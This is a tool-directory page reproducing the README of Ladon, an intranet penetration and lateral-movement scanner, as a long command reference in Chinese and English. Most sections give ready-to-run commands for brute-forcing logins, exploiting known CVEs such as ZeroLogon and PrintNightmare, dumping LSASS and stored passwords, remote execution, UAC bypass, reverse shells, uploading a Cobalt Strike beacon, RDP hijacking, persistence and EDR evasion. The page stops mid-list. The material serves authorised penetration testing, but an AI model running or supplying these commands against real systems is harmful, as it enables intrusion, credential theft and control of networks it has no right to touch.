Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Ladon — Ladon大型内网渗透扫描器,PowerShell、Cobalt Strike插件、内存加载、无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。网络资产探测32种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)或方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等,大量高危漏洞检测模块MS17010、Zimbra、Exchange | Kitploit
Tools/GitHubGitHub/k8gege/ladon
Privilege EscalationReconnaissanceVulnerability ScannersNetwork MappingPassword AttacksPort ScanningExploitationLateral MovementInformation GatheringWeb SecurityPenetration TestingSubdomain Enumeration
5.3k8821 year agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →

About

Ladon大型内网渗透扫描器,PowerShell、Cobalt Strike插件、内存加载、无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。网络资产探测32种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)或方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等,大量高危漏洞检测模块MS17010、Zimbra、Exchange

GitHubk8gege/ladon

Ladon

View RepositoryWebsite
Share

Ladon Large-scale Intranet Penetration Scanner Cobalt Strike Plugin Memory Loading

Author Ladon Bin GitHub issues Github Stars GitHub forks GitHub license Downloads

image

Program Introduction

Ladon is a large-scale intranet penetration scanner, domain penetration, and lateral movement tool, featuring PowerShell modules, Cobalt Strike plugins, memory loading, and fileless scanning. It includes port scanning, service identification, network asset detection, password auditing, high-risk vulnerability detection, vulnerability exploitation, password retrieval, and one-click GetShell. It supports batch scanning of A/B/C segments and cross-subnet scanning, as well as URL, host, and domain list scanning. Version 12.2 includes 262 functional modules, with the network asset detection module supporting 30+ protocols (ICMP, NBT, DNS, MAC, SMB, WMI, SSH, HTTP, HTTPS, Exchange, MSSQL, FTP, RDP) and methods to quickly obtain target network live host IPs, computer names, workgroups, shared resources, MAC addresses, OS versions, websites, subdomains, middleware, open services, routers, switches, databases, printers, and more. It detects 16+ high-risk vulnerabilities including Cisco, Zimbra, Exchange, DrayTek, MS17010, SMBGhost, Weblogic, ActiveMQ, Tomcat, Struts2 series, Printer, etc. Password auditing covers 25+ types including databases (MySQL, Oracle, MSSQL), FTP, SSH, VNC, Windows (LDAP, SMB/IPC, NBT, WMI, SmbHash, WmiHash, Winrm), BasicAuth, Tomcat, Weblogic, Rar, etc. Remote command execution includes smbexec, wmiexe, psexec, atexec, sshexec, webshell. The web fingerprint identification module can recognize 135+ items (web applications, middleware, script types, page types). Local privilege escalation includes 21+ methods such as SweetPotato, BadPotato, EfsPotato, BypassUAC. It is highly customizable with plugin POC support for .NET assemblies, DLLs (C#/Delphi/VC), PowerShell, etc. It supports calling any external programs or commands via configuration INI files. The EXP generator can create vulnerability POC/EXP to quickly extend scanning capabilities. Ladon supports Cobalt Strike plugin-based memory loading for fileless scanning in intranet lateral movement.

Ladon Download```Bash

https://github.com/k8gege/Ladon/releases https://k8gege.org/Download

root@kitploit:~
### 使用简单

虽然Ladon功能丰富多样,但使用却非常简单,任何人都能轻易上手<br>
只需一或两个参数就可用90%的功能,一个模块相当于一个新工具

### 运行环境

#### Windows

Ladon可在安装有.net 2.0及以上版本Win系统中使用(Win7后系统自带.net)<br>
如Cmd、PowerShell、远控Cmd、WebShell等,以及Cobalt Strike内存加载使用<br>
Ladon.ps1完美兼容Win7-Win11/2025 PowerShell,不看版本远程加载无文件渗透

#### 全平台LadonGo支持Linux、Mac、Arm、MIPS
全平台:Linux、MacOS、Windows、路由器、网络设备等OS系统<br>
https://github.com/k8gege/LadonGo

### 奇葩条件

实战并不那么顺利,有些内网转发后很卡或无法转发,只能将工具上传至目标<br>
有些马可能上传两三M的程序都要半天甚至根本传不了,PY的几十M就更别想了<br>
Ladon采用C#研发,程序体积很小500K左右,即便马不行也能上传500K程序吧<br>
还不行也可PowerShell远程内存加载,这点是PY或GO编译的大程序无法比拟的

### 宗旨

一条龙服务,为用户提供一个简单易用、功能丰富、高度灵活的扫描工具

### 特色

扫描流量小<br>
程序体积小<br>
功能丰富强大<br>
程序简单易用<br>
插件支持多种语言<br>
跨平台(Win/Kali/Ubuntu)等<br>
支持Cobalt Strike插件化<br>
支持PowerShell无文件渗透<br>
Exp生成器可一键生成Poc<br>
多版本适用各种环境

### 程序参数功能

1  支持指定IP扫描<br>
2  支持指定域名扫描<br>
3  支持指定机器名扫描<br>
4  支持指定C段扫描(ip/24)<br>
5  支持指定B段扫描(ip/16)<br>
6  支持指定A段扫描(ip/8)<br>
7  支持指定URL扫描<br>
8  支持批量IP扫描(ip.txt)<br>
9  支持批量C段扫描(ip24.txt)<br>
10 支持批量C段扫描(ipc.txt)<br>
11 支持批量B段扫描(ip16.txt)<br>
12 支持批量URL扫描(url.txt)<br>
13 支持批量域名扫描(domain.txt)<br>
14 支持批量机器名扫描(host.txt)<br>
15 支持批量国家段扫描(cidr.txt)<br>
16 支持批量字符串列表(str.txt)<br>
17 支持主机帐密列表(check.txt)<br>
18 支持用户密码列表(userpass.txt)<br>
19 支持指定范围C段扫描<br>
20 支持参数加载自定义DLL(仅限C#)<br>
21 支持参数加载自定义EXE(仅限C#)<br>
22 支持参数加载自定义INI配置文件<br>
23 支持参数加载自定义PowerShell<br>
24 支持自定义程序(系统命令或第三方程序即任意语言开发的程序或脚本)<br>
25 插件(支持多种语言C#/Delphi/Golang/Python/VC/PowerShell)<br>
26 支持Cobalt Strike(beacon命令行下扫描目标内网或跳板扫描外网目标)<br>
27 支持CIDR格式IP扫描,如100.64.0.0/10,192.168.1.1/20等<br>
28 INI配置支持自定义程序密码爆破<br>

### 简明使用教程

Ladon 简明使用教程 完整文档: http://k8gege.org/Ladon <br>
Excel模块功能文档: http://k8gege.org/Ladon/wiki.xlsx <br>
支持Cmd、Cobalt Strike、PowerShell等内存加载<br>
Windows版本: .Net、Cobalt Strike、PowerShell<br>
全系统版本:GO(全平台)、Python(理论上全平台)<br>
PS: Study方便本地学习使用,完整功能请使用CMD

### BypassEDR扫描

默认扫描速度很快,有些WAF或EDR防御很强<br>
设置几线程都有可能20分钟左右就不能扫了<br>
bypassEDR模拟人工访问,绕过速度检测策略<br>

扫描速度较慢,追求速度的愣头青不要使用<br>```Bash
Ladon 10.1.2.8/24 MS17010 bypassEDR

密码爆破相关模块暂不支持bypassEDR参数

001 自定义线程扫描

例子:扫描目标10.1.2段是否存在MS17010漏洞
单线程:```Bash Ladon 10.1.2.8/24 MS17010 t=1

root@kitploit:~
80 threads:```Bash
Ladon noping 10.1.2.8/24 MS17010 t=80

Under high-intensity protection, set the scanning thread lower, F single thread
```Bash Ladon 10.1.2.8/24 MS17010 f=1

root@kitploit:~
### 002 Socks5 Proxy Scanning
Example: Using 8 threads to scan target segment 10.1.2 for MS17010 vulnerability<br>```Bash
Ladon noping 10.1.2.8/24 MS17010 t=8

详见:http://k8gege.org/Ladon/proxy.html

PS:代理工具不支持Socks5,所以必须加noping参数扫描
不管是Frp还是其它同类工具,最主要是Proxifier等工具不支持ICMP协议
因为Ladon默认先用ICMP探测存活后,才使用对应模块测试
所以代理环境下得禁ping扫描,系统ping使用的就是ICMP协议

003 网段扫描/批量扫描

CIDR格式:不只是/24/16/8(所有)```Bash Ladon 192.168.1.8/24 扫描模块 Ladon 192.168.1.8/16 扫描模块 Ladon 192.168.1.8/8 扫描模块

root@kitploit:~
Letter format: only C segment, B segment, A segment, sorted in order.```Bash
Ladon 192.168.1.8/c 扫描模块
Ladon 192.168.1.8/b 扫描模块
Ladon 192.168.1.8/a 扫描模块

0x004 Specify IP range, subnet scanning

ICMP probe for live hosts in the 50-200 range```Bash

Ladon 192.168.1.50-192.168.1.200 ICMP

root@kitploit:~
#### ICMP probe live hosts from 1.30 to 50.80```Bash
Ladon 192.168.1.30-192.168.50.80 ICMP  

TXT格式

004 ICMP batch scan C segment list for live hosts```Bash

Ladon ip24.txt ICMP Ladon ipc.txt ICMP

root@kitploit:~
##### 005 ICMP Batch Scan B-Segment List for Live Hosts```Bash
Ladon ip16.txt ICMP
006 ICMP batch scan cidr list (e.g., IP ranges of a certain country)```Bash

Ladon cidr.txt ICMP

root@kitploit:~
##### 007 ICMP Batch Scan for Domain Liveness```Bash
Ladon domain.txt ICMP
008 ICMP batch scan for machine liveness using hostnames or machine names to probe```Bash

Ladon host.txt ICMP

root@kitploit:~
##### 009 WhatCMS batch recognition of CMS, Banner, SSL certificate, title, can identify unknown CMS, routers, printers, network devices, cameras, etc.```Bash
Ladon 192.168.1.8 WhatCMS   扫描IP
Ladon 192.168.1.8/24 WhatCMS   扫描C段
Ladon 192.168.1.8/C WhatCMS   扫描C段
Ladon 192.168.1.8/B WhatCMS   扫描B段
Ladon 192.168.1.8/A WhatCMS   扫描A段
Ladon IP.TXT WhatCMS   扫描IP列表
Ladon IP24.TXT WhatCMS   扫描C段列表
Ladon IP16.TXT WhatCMS   扫描B段列表
Ladon cidr.TXT WhatCMS   扫描整个国家IP段列表
禁PING扫描<br>
Ladon noping 192.168.1.8 WhatCMS   扫描IP
Ladon noping 192.168.1.8/24 WhatCMS   扫描C段
010 Batch Detection of DrayTek Router Versions, Vulnerabilities, Weak Passwords```Bash

Ladon url.txt DraytekPoc

root@kitploit:~
##### 011 Batch Decrypt Base64 Passwords```Bash
Ladon str.txt DeBase64

Asset scanning, fingerprinting, service identification, live host discovery, port scanning

image

012 ICMP scan live hosts (fastest)```Bash

Ladon 192.168.1.8/24 ICMP

root@kitploit:~
##### 013 Ping probes live hosts (calls system Ping command, displays ms, ttl and other info)```Bash
Ladon 192.168.1.8/24 Ping

If you consider that only if ping command succeeds means the host is alive, you can use this command in batch

014 Multi-protocol probe for live hosts (IP, hostname, MAC/domain, manufacturer/OS version)```Bash

Ladon 192.168.1.8/24 OnlinePC

root@kitploit:~
##### 015 Multi-protocol OS Identification (IP, Hostname, OS Version, Open Services)```Bash
Ladon 192.168.1.8/24 OsInfo
016 OXID Detection of Multi-NIC Hosts```Bash

Ladon 192.168.1.8/24 EthInfo Ladon 192.168.1.8/24 OxidInfo

root@kitploit:~
##### 017 DNS probing multi-NIC host```Bash
Ladon 192.168.1.8/24 DnsInfo
018 Multi-protocol Scanning for Alive Host IPs```Bash

Ladon 192.168.1.8/24 OnlineIP

root@kitploit:~
##### 019 Scan SMB vulnerability MS17010 (IP, machine name, vulnerability number, OS version)```Bash
Ladon 192.168.1.8/24 MS17010
020 SMBGhost Vulnerability Detection CVE-2020-0796 (IP, Hostname, Vulnerability ID, OS Version)```Bash

Ladon 192.168.1.8/24 SMBGhost

root@kitploit:~
##### 021 Scan Web title and banner: For more comprehensive information, use the WhatCMS module detection```Bash
Ladon 192.168.1.8/24 WebInfo
Ladon http://192.168.1.8 WebInfo
Ladon 192.168.1.8/24 WebScan
Ladon http://192.168.1.8 WebScan
022 Scanning C-segment Site URL Domains```Bash

Ladon 192.168.1.8/24 UrlScan

root@kitploit:~
##### 023 Scanning C-Class Site URL Domains```Bash
Ladon 192.168.1.8/24 SameWeb
024 Scanning subdomains and second-level domains```Bash

Ladon baidu.com SubDomain

root@kitploit:~
##### 025 Domain Name Resolution IP, Hostname Resolution IP```Bash
Ladon baidu.com DomainIP
Ladon baidu.com HostIP
025 Batch Domain Name Resolution IP, Batch Hostname Resolution IP```Bash

Ladon domain.txt DomainIP Ladon host.txt HostIP

root@kitploit:~
##### 025 Batch Domain and Hostname Resolution Returns Only IP```Bash
Ladon domain.txt Domain2IP
Ladon host.txt Host2IP
026 DNS query for machines and IPs within the domain (condition: within domain, specify domain controller IP)```Bash

Ladon AdiDnsDump 192.168.1.8

root@kitploit:~
##### 027 Query domain machines, IP (within domain)
Ladon GetDomainIP

##### 028 Scan C-segment ports, specified port scan```Bash
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
Scan C-segment WEB and identify CMS (800+ Web fingerprint recognition)```Bash

Ladon 192.168.1.8/24 CMS Ladon 192.168.1.8/24 CmsInfo Ladon 192.168.1.8/24 WhatCMS

root@kitploit:~
##### 030 Scan Cisco Devices```Bash
Ladon 192.168.1.8/24 CiscoInfo
Ladon http://192.168.1.8 CiscoInfo
031 Enumerate MSSQL Database Hosts (Database IP, Machine Name, SQL Version)```Bash

Ladon EnumMssql

root@kitploit:~
##### 032 Enumerate Network Shared Resources 	(Domain, IP, Hostname\Share Path)```Bash
Ladon EnumShare
Scan LDAP Server (Detect Domain Controller)```Bash

Ladon 192.168.1.8/24 LdapInfo

root@kitploit:~
##### 034 Scan FTP servers and identify versions```Bash
Ladon 192.168.1.8/24 FtpInfo

Brute Force / Network Authentication / Weak Passwords / Password Cracking / Database / Website Backend / Login Portals / System Login

image For detailed password cracking, refer to SSH: http://k8gege.org/Ladon/sshscan.html

035 445 Port SMB Password Cracking (Windows)```Bash

Ladon 192.168.1.8/24 SmbScan

root@kitploit:~
##### 036 Port 135 Wmi Password Brute Force (Windowns)```Bash
Ladon 192.168.1.8/24 WmiScan
037 Port 389 LDAP Server, AD Domain Password Brute Force (Windows)```Bash

Ladon 192.168.1.8/24 LdapScan

root@kitploit:~
##### 038 Port 5985 WinRM Password Brute Force (Windows)```Bash
Ladon 192.168.1.8/24 WinrmScan
039 445 port SMB NTLM hash cracking (Windows)```Bash

Ladon 192.168.1.8/24 SmbHashScan

root@kitploit:~
##### 040 Port 135 Wmi NTLM HASH Brute-force (Windows)```Bash
Ladon 192.168.1.8/24 WmiHashScan
041 Port 22 SSH password brute force (Linux)```Bash

Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan

root@kitploit:~
##### 042 Port 1433 Mssql Database Password Brute Force```Bash
Ladon 192.168.1.8/24 MssqlScan
043 Port 1521 Oracle Database Password Brute Force```Bash

Ladon 192.168.1.8/24 OracleScan

root@kitploit:~
Oracle databases are special; only blasting the ORCL library will miss many privileges<br>See details: http://k8gege.org/Ladon/OracleScan.html<br>


##### 044 3306 port Mysql database password brute force```Bash
Ladon 192.168.1.8/24 MysqlScan
045 Port 7001 Weblogic Backend Password Brute Force```Bash

Ladon http://192.168.1.8:7001/console WeblogicScan Ladon 192.168.1.8/24 WeblogicScan

root@kitploit:~
##### 046 5900 port VNC remote desktop password brute force```Bash
Ladon 192.168.1.8/24 VncScan
047 Port 21 FTP Server Password Brute Force```Bash

Ladon 192.168.1.8/24 FtpScan

root@kitploit:~
##### 048 Port 8080 Tomcat background login password brute force```Bash
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
049 Web Port 401 Basic Authentication Password Brute-force```Bash

Ladon http://192.168.1.8/login HttpBasicScan Ladon ip.txt 401Scan

root@kitploit:~
##### 052 Port 139 Netbios Protocol Windows Password Brute-force```Bash
Ladon 192.168.1.8/24 NbtScan
053 5985 port WinRM protocol Windows password brute-force```Bash

Ladon 192.168.1.8/24 WinrmScan

root@kitploit:~
##### 054 Network Camera Password Brute Force (Built-in Default Passwords)```Bash
Ladon 192.168.1.8/24 DvrScan

Vulnerability Detection/Poc

image

055 SMB Vulnerability Detection (CVE-2017-0143/CVE-2017-0144)```Bash

Ladon 192.168.1.8/24 MS17010

root@kitploit:~
##### 056 SMBGhost Vulnerability Detection CVE-2020-0796		911 Reserved```Bash
Ladon 192.168.1.8/24 SMBGhost
057 Weblogic Vulnerability Detection (CVE-2019-2725/CVE-2018-2894)```Bash

Ladon 192.168.1.8/24 WeblogicPoc

root@kitploit:~
##### 058 PhpStudy backdoor detection(phpstudy 2016/phpstudy 2018)  10.9 removed 911 retained```Bash
Ladon 192.168.1.8/24 PhpStudyPoc
059 ActiveMQ Vulnerability Detection (CVE-2016-3088)```Bash

Ladon 192.168.1.8/24 ActivemqPoc

root@kitploit:~
##### 060 Tomcat Vulnerability Detection (CVE-2017-12615)```Bash
Ladon 192.168.1.8/24 TomcatPoc
061 Struts2 Vulnerability Detection (S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode/S2-045/S2-037)```Bash

Ladon 192.168.1.8/24 Struts2Poc

root@kitploit:~
##### 062 DraytekPoc CVE-2020-8515 Vulnerability Detection, Draytek Version Detection, Weak Password Detection```Bash
Ladon 192.168.1.8 DraytekPoc
Ladon 192.168.1.8/24 DraytekPoc
FortiGate CVE-2024-55591 Unauthorized RCE Vulnerability Detection```Bash

Ladon 192.168.1.8/24 CVE-2024-55591

root@kitploit:~
### Vulnerability Exploitation/Exploit
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 063 Weblogic Vulnerability Exploitation (CVE-2019-2725)```Bash
Ladon 192.168.1.8/24 WeblogicExp
064 Tomcat vulnerability exploitation (CVE-2017-12615)```Bash

Ladon 192.168.1.8/24 TomcatExp

root@kitploit:~
##### Universal DLL Injection CMD Executor for Windows 0day Vulnerabilities (DLL only 5KB)```Bash
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
066 CVE-2021-40444 Microsoft IE/Office 0-day vulnerability```Bash

Ladon CVE-2021-40444 MakeCab poc.dll Ladon CVE-2021-40444 MakeHtml http://192.168.1.8

root@kitploit:~
##### 067 DraytekExp CVE-2020-8515 Remote Command Execution EXP```Bash
Ladon DraytekExp http://192.168.1.8  whoami
068 Domain Penetration ZeroLogon CVE-2020-1472 Domain Controller Privilege Escalation (Password Set to Empty)```Bash

Ladon ZeroLogon dc.k8gege.org

root@kitploit:~
##### 069 CVE-2020-0688 Exchange Serialization Vulnerability (.net 4.0)```Bash
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
070 ForExec Loop Exploit (Win10 Eternal Black CVE-2020-0796, successfully exit to prevent target blue screen)```Bash

Ladon ForExec "CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished"

root@kitploit:~
### File Download, File Transfer

##### 071 Intranet File Transfer HTTP Download HTTPS Download MSF Download```Bash
Ladon wget https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe<br>
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
072 Intranet File Transfer FTP Download```Bash

Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe

root@kitploit:~
### Encryption and Decryption (HEX/Base64)

##### 073 Hex Encryption and Decryption```Bash
Ladon 123456 EnHex
Ladon 313233343536 DeHex
074 Base64 Encryption and Decryption```Bash

Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64 Ladon str.txt DeBase64

root@kitploit:~
### Network Sniffing

##### 075 Ftp Password Sniffing (Bind local IP, automatically sniff Class C segment)
Multi-NIC machine, sniff corresponding Class C segment IP```Bash
Ladon FtpSniffer 192.168.1.5
076 HTTP password sniffing (bind local IP, automatically sniff C segment)

Multi-NIC machine, sniff corresponding C segment IP```Bash Ladon HTTPSniffer 192.168.1.5

root@kitploit:~
##### 077 Network Sniffing```Bash
Ladon Sniffer

Password Retrieval

078 Read IIS site passwords, website paths```Bash

Ladon IISpwd

root@kitploit:~
##### 079 Read passwords of previously connected WiFi```Bash
Ladon WifiPwd
080 Retrieve FileZilla FTP Password```Bash

Ladon FileZillaPwd

root@kitploit:~
##### 081 Read system Hash, VPN passwords, DPAPI-Key  10.9 removed```Bash
Ladon CVE-2021-36934  
082 DumpLsass memory password (mimikatz plaintext) limited to versions before 9.1.1```Bash

Ladon DumpLsass

root@kitploit:~
### Information Gathering

![image](http://k8gege.org/k8img/Ladon/Study/Linfo.PNG)

##### 083 API View Current User```Bash
Ladon w
Ladon whoami
083 Obtain Local Internal IP and External IP```Bash

Ladon GetIP Ladon IPinfo

root@kitploit:~
##### 084 Get PCname GUID CPUID DiskID Mac Address```Bash
Ladon GetID
085 View User's Recently Accessed Files```Bash

Ladon Recent

root@kitploit:~
##### 086 USB drive, USB usage record viewing (USB name, USB tag, path information)```Bash
Ladon UsbLog
087 Detect Backdoor (Registry Startup Items, DLL Hijacking)```Bash

Ladon CheckDoor Ladon AutoRun

root@kitploit:~
##### 088 Process Details (Program Path, Bitness, Startup Parameters, User)```Bash
Ladon EnumProcess
Ladon Tasklist
089 Get Command Line Arguments```Bash

Ladon cmdline Ladon cmdline cmd.exe

root@kitploit:~
##### 090 Obtain Basic Penetration Information```Bash
Ladon GetInfo
Ladon GetInfo2
091 .NET & PowerShell Version```Bash

Ladon NetVer Ladon PSver Ladon NetVersion Ladon PSversion

root@kitploit:~
##### 092 Runtime Version & Build Environment```Bash
Ladon Ver
Ladon Version
093 Runtime Version & Compilation Environment & Installed Software List```Bash

Ladon AllVer Ladon AllVersion

root@kitploit:~
##### 094 View IE proxy information```Bash
Ladon QueryProxy
095 DirList Directory Listing + Basic Penetration Info
Default: list entire disk
```Bash

Ladon DirList

root@kitploit:~
###### Specify drive letter or directory```Bash
Ladon DirList c:\   
096 QueryAdmin View Admin Users```Bash

Ladon QueryAdmin

root@kitploit:~
##### 097 View Local Named Pipes```Bash
Ladon GetPipe
098 RdpLog View 3389 Connection Records```Bash

Ladon RdpLog

root@kitploit:~
### Remote Execution (psexec/wmiexec/atexec/sshexec/smbexec)

![image](http://k8gege.org/k8img/Ladon/Study/Rexec.PNG)

##### 099 445 Port Encrypted PSEXEC Remote Command Execution(交互式)```Bash
net use \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system
100 135 port WmiExec remote command execution (non-interactive)```Bash

Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### 101 445 port AtExec remote command execution (non-interactive)```Bash
Ladon AtExec 192.168.1.8 k8gege k8gege520 whoami
102 22 port SshExec remote command execution (non-interactive)```Bash

Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

root@kitploit:~
##### 103 JspShell Remote Command Execution (Non-Interactive) 9.3.0 Removed
Usage: Ladon JspShell type url pwd cmd```Bash
Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
104 WebShell Remote Command Execution (Non-interactive) Removed in 9.3.0```Bash

Usage:Ladon WebShell ScriptType ShellType url pwd cmd Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon whoami 获取系统版本信息 方便提权 Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon OSinfo

root@kitploit:~
##### Ports 105 and 135 WmiExec2 remote command execution supports HASH (non-interactive) supports file upload```Bash
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami		 先Mimikatz注入Hash,再pth执行命令
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe  先Mimikatz注入Hash,再pth执行命令
106 port 445 SmbExec Ntlm-Hash non-interactive remote command execution (no echo)```Bash

Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### 107 WinrmExec Remote Command Execution Without Echo (Supports System Privileges)```Bash
Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe

Privilege Escalation & De-escalation

image

108 whoami View current user rights and privileges```Bash

Ladon whoami

root@kitploit:~
##### 109  6 types of whitelist BypassUAC (after 8.0) Win7-Win10  version 10.8 removed only 911 retained
Usage: Ladon BypassUAC Method Base64Cmd```Bash
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
110 BypassUac2 Bypass UAC execution, supports Win7-Win10 10.8 version removed only 911 remains```Bash

Ladon BypassUac2 c:\1.exe Ladon BypassUac2 c:\1.bat

root@kitploit:~
##### 111 PrintNightmare (CVE-2021-1675 | CVE-2021-34527) Printer Vulnerability Privilege Escalation EXP```Bash
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
112 CVE-2022-21999 SpoolFool Printer Vulnerability Privilege Escalation EXP```Bash

Ladon SpoolFool poc.dll Ladon CVE-2022-21999 poc.dll

root@kitploit:~
##### 113 GetSystem Privilege escalation to System to execute CMD```Bash
Ladon GetSystem cmd.exe
114 Copy token to execute CMD (e.g., downgrade from system privilege to current user's explorer)```Bash

Ladon GetSystem cmd.exe explorer

root@kitploit:~
##### 115 Runas Impersonate User to Execute Command```Bash
Ladon Runas user pass cmd
116 MS16135 Privilege Escalation to SYSTEM```Bash

Ladon ms16135 whoami >=9.2.1版本移除 911保留

root@kitploit:~
##### 117 BadPotato Service User Privilege Escalation to SYSTEM```Bash
Ladon BadPotato cmdline
118 SweetPotato Service User Privilege Escalation to SYSTEM```Bash

Ladon SweetPotato cmdline

root@kitploit:~
##### 119 EfsPotato Win7-2019 Privilege Escalation (Service User to System)```Bash
Ladon EfsPotato whoami
120 Open3389 One-click Enable 3389```Bash

Ladon Open3389

root@kitploit:~
##### 121 Activate Built-in Administrator```Bash
Ladon ActiveAdmin
122 Activate built-in user Guest```Bash

Ladon ActiveGuest

root@kitploit:~
### Reverse Shell

##### 123 Reverse TCP NC Shell```Bash
Ladon ReverseTcp 192.168.1.8 4444 nc
124 Reverse TCP MSF Shell```Bash

Ladon ReverseTcp 192.168.1.8 4444 shell

root@kitploit:~
##### 125 Reverse TCP MSF MET Shell```Bash
Ladon ReverseTcp 192.168.1.8 4444 meter
126 Reverse HTTP MSF MET Shell```Bash

Ladon ReverseHttp 192.168.1.8 4444

root@kitploit:~
##### 127 Reverse HTTPS MSF MET Shell```Bash
Ladon ReverseHttps 192.168.1.8 4444
128 Reverse TCP CMD & PowerShell Shell```Bash

Ladon PowerCat 192.168.1.8 4444 cmd Ladon PowerCat 192.168.1.8 4444 psh

root@kitploit:~
##### 129 Reverse UDP Cmd & PowerShell Shell```Bash
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
130 netsh localhost port 888 forward to port 22 of 112```Bash

Ladon netsh add 888 192.168.1.112 22

root@kitploit:~
##### 131  PortTran Port Forwarding (3389 example)```Bash
VPS监听: Ladon PortTran 8000 338
目标转发: Ladon PortTran 内网IP 3389 VPS_IP 8000
本机连接: mstsc VPS_IP:338

Local Execution

132 RDP Desktop Session Hijacking (No Password Required)```Bash

Ladon RdpHijack 3 Ladon RdpHijack 3 console

root@kitploit:~
##### 133 Add Registry Run Startup Entry```Bash
Ladon RegAuto Test c:\123.exe
134 AT Scheduled Task Execution (No Time Required) (SYSTEM Privileges)```Bash

Ladon at c:\123.exe Ladon at c:\123.exe gui

root@kitploit:~
##### 135 SC service add startup item & execute program(system permission)```Bash
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName

System Information Detection

136 Snmp Protocol Detection of Operating System, Devices, etc.```Bash

Ladon 192.168.1.8/24 SnmpInfo

root@kitploit:~
##### 137  Nbt protocol to detect Windows host name, domain, user```Bash
Ladon 192.168.1.8/24 NbtInfo
138 SMB protocol detection of Windows version, hostname, domain```Bash

Ladon 192.168.1.8/24 SmbInfo

root@kitploit:~
##### 139 WMI Protocol Detect Windows Version, Hostname, Domain```Bash
Ladon 192.168.1.8/24 WmiInfo
140 Mssql protocol detection of Windows version, hostname, domain```Bash

Ladon 192.168.1.8/24 MssqlInfo

root@kitploit:~
##### 141  WinRM protocol to detect Windows version, hostname, domain```Bash
Ladon 192.168.1.8/24 WinrmInfo
142 Exchange detection of Windows version, hostname, domain```Bash

Ladon 192.168.1.8/24 ExchangeInfo

root@kitploit:~
##### 143  Rdp protocol probing Windows version, hostname, domain```Bash
Ladon 192.168.1.8/24 RdpInfo

Other Features

144 Win2008 One-click Enable .net 3.5```Bash

Ladon EnableDotNet

root@kitploit:~
##### 145 Get HTML source code of intranet site```Bash
